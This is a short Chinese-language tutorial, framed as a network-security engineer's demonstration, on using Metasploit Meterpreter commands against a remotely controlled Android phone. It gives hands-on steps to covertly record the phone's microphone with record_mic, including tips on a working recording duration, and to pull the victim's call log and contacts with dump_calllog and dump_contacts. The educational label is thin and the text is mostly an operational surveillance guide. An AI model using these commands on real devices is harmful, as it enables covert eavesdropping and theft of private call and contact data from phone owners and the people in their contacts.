黑客攻击与安全教育(网络安全工程师演示)(1)

一、远控并录音实战

record_mic

此命令默认录制默认麦克风录制1秒钟的音频,并将尝试不带精度的参数来播放捕获的音频wav文件。

record_mic参数:

-h:显示帮助。

-d :记录的秒数,默认为1秒

(默认的1秒听不到啥,设置高了又会报错:Error running command record_mic: Rex::TimeoutError Operation timed out

本人在Kali linux测得13为最优秒数)

-F :wav文件路径。默认为HOME / [随机乱码名字] .wav

-p :自动播放捕获的音频,默认为“true”。

操作详解:

在kali虚拟机终端输入:?查看msf中的帮助选项

黑客攻击与安全教育(网络安全工程师演示)(2)

继续在msf中输入:record_mic,默认录制默认麦克风录制1秒钟的音频,并将尝试不带精度的参数来播放捕获的音频wav文件

黑客攻击与安全教育(网络安全工程师演示)(3)

msf中输入:record_mic -d 15 ,录音安卓手机15秒的音频并保存。

黑客攻击与安全教育(网络安全工程师演示)(4)

二、获取通话记录实战

dump_calllog,将安卓手机的通话记录保存到指定文件中

dump_contacts,查看安卓手机的电话本

操作详解:

在msf中输入:dump_calllog

黑客攻击与安全教育(网络安全工程师演示)(5)

,